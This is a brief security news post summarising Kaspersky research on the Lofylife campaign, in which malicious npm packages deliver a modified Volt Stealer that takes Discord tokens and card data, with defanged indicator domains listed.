September 22, 2023

Researchers have discovered an attack campaign named Lofylife that uses malicious npm packages, targeting Discord users to steal Discord tokens and users’ card data.

The Python malware is a modified version of an open-source token logger called Volt Stealer. It is intended to steal Discord tokens from infected machines, along with the victim’s IP address, and upload them via HTTP.

It detects when a user logs in, changes email or password, enables/disables MFA, and adds new payment methods, including complete bank card details. Collected information is also uploaded to the remote endpoint whose address is hard-coded.

Advertisements

The campaign is a piece of evidence against the developer community and downstream customers of Dev environment, unwittingly downloading malware as they use open-source packages to accelerate time-to-market.

Data is exfiltrated to Replit-hosted instances:

  • life.polarlabs.repl[.]co
  • Sock.polarlabs.repl[.]co
  • idk.polarlabs.repl[.]co

With more than 11 million users using npm, the potential audience of a successful supply chain attack is significant compared to targeting a specific company.

This research was conducted and documented by Kaspersky researchers

Tags:

Leave a Reply

You may have missed

T-Mobile and Data Breach tightly coupled

September 21, 2023

Cisco Acquires Splunk in a blockbuster deal

September 21, 2023

Atlassian BitBucket and Confluence Vulnerabilities

September 21, 2023

Snatch ransomware Dissection

September 21, 2023

Fortinet Fixes Vulnerabilities in FortiOS

September 20, 2023

Trend Micro Endpoint Vulnerability – CVE-2023-41179

September 20, 2023
%d bloggers like this: